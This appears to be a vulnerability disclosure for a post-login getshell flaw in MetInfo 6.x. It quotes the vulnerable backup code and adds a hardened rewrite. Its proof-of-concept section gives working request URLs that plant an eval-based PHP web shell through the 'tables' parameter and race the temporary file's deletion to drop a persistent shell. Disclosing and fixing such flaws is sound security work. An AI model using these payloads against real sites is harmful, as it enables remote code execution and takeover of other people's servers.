MetInfo 6.x backend getshell

Description: An issue was discovered in MetInfo 6.x. An attacker can use the backend database backup function to obtain a web shell.

1. Technical Description:

The relevant code is in /app/system/databack/admin/index.class.php, lines 456 to 478:

```php
public function dogetsql($table='') {
    global $_M;
    // 'tables' is taken straight from the request and used as-is
    if($_M['form']['tables'] && !$table)$table = $_M['form']['tables'];
    $localurl=$_M['config']['met_weburl'];
    $tablepre=$_M['config']['tablepre'];
    $fileid = isset($_M['form']['fileid']) ? $_M['form']['fileid'] : 1;
    if($table){
        $tables=$table;   // may be a plain string rather than an array
    }else{
        $tables=$this->dotableprearray($tablepre);
    }

    $sizelimit=2048;

    if($fileid==1){
        $random = isset($_M['form']['random']) ? $_M['form']['random'] : met_rand(6);
        // sink: the request-controlled $tables is written into a .php file
        $this->docache_write('bakup_tables.php', $tables);
    }elseif(!$tbl){   // $tbl is not defined in this excerpt
        $random = isset($_M['form']['random']) ? $_M['form']['random'] : met_rand(6);
        $allidlist=explode('|',$tablestx);   // $tablestx is not defined in this excerpt
        for($i=0;$i<count($allidlist)-1;$i++){
            $tables[$i]=$allidlist[$i];
        }
    }
    // ... (excerpt continues in the original file)
```

If a string-typed `tables` parameter is posted, the program passes it to docache_write, located at lines 334 to 351:

```php
function docache_write($file, $string, $type = 'array'){
    global $_M;
    // only arrays are serialised; a plain string falls through untouched
    if(is_array($string))
    {
        $type = strtolower($type);
        if($type == 'array')
        {
            $string = "<?php\n return ".var_export($string,TRUE).";\n?>";
        }
        elseif($type == 'constant')
        {
            $data='';
            foreach($string as $key => $value) $data .= "define('".strtoupper($key)."','".addslashes($value)."');\n";
            $string = "<?php\n".$data."\n?>";
        }
    }
    // a string $string is written verbatim into a .php file under the web root
    file_put_contents(PATH_WEB.ADMIN_FILE.'/databack/'.$file, $string);
}
```

This creates a file named 'bakup_tables.php' in /admin/databack/, and its content is under our control. However, at the end of the function dogetsql, the program deletes the temporary file 'bakup_tables.php':

```php
$this->docache_delete('bakup_tables.php', $tables);
```

So a race condition is needed to get the code executed before the file is deleted.
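As an added illustration (not MetInfo's code and not the vendor's patch), the following shows one way to close both weaknesses the analysis relies on: dogetsql trusting the `tables` request parameter, and docache_write writing a non-array value verbatim into a .php file. The function names, the `$knownTables` list and the `CACHE_DIR` constant are assumptions.

```php
<?php
// Added example, not MetInfo code. Assumptions: CACHE_DIR is a directory
// that the web server does not serve; $knownTables is the list of real
// table names read from the database (constructed values below).

// 1. Only accept table names that actually exist; never use the raw request.
function filterTableNames($requested, array $knownTables) {
    // A plain string (the shape the analysis above abuses) is rejected outright.
    if (!is_array($requested)) {
        return array();
    }
    $clean = array();
    foreach ($requested as $name) {
        // Strict identifier syntax plus whitelist against the real table list.
        if (is_string($name)
            && preg_match('/^[A-Za-z0-9_]{1,64}$/', $name) === 1
            && in_array($name, $knownTables, true)) {
            $clean[] = $name;
        }
    }
    return $clean;
}

// 2. Cache writer that never turns request data into executable PHP.
function docache_write_safe($file, $data) {
    // Bare file names only: no path separators, no traversal.
    if ($file === '' || basename($file) !== $file) {
        throw new InvalidArgumentException('bad cache file name');
    }
    // Refuse anything but an array; a string would otherwise be stored verbatim.
    if (!is_array($data)) {
        throw new InvalidArgumentException('cache payload must be an array');
    }
    // Store as JSON data with a non-executable extension, outside the web root.
    // Even if the file were reachable and existed briefly, there is no code to run,
    // which also removes the delete-race window described above.
    $payload = json_encode(array_values($data));
    return file_put_contents(CACHE_DIR . '/' . $file . '.json', $payload, LOCK_EX);
}

// Example use with constructed values:
define('CACHE_DIR', sys_get_temp_dir());            // assumption: non-web-served dir
$knownTables = array('met_example_table', 'met_example_config');
$fromRequest = isset($_M['form']['tables']) ? $_M['form']['tables'] : null;
$tables = filterTableNames($fromRequest, $knownTables);  // string input -> array()
docache_write_safe('bakup_tables', $tables);
```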

2. PoC

Download the latest version (https://www.mituo.cn/upload/file/MetInfo6.1.3.zip) and build a test site, then open it in Google Chrome. After the administrator has logged in, we use this URL:

http://127.0.0.1/metinfo6.1.3/admin/index.php?n=databack&c=index&a=dogetsql&anyid=13&lang=cn&tables=<?php eval($_GET[2]);?>&fileid=1

At the same time, to win the race condition, we request:

http://127.0.0.1/metinfo6.1.3/admin/databack/bakup_tables.php?2=file_put_contents('info.php','<?php%20phpinfo();?>');

Then we get a shell at /admin/databack/info.php.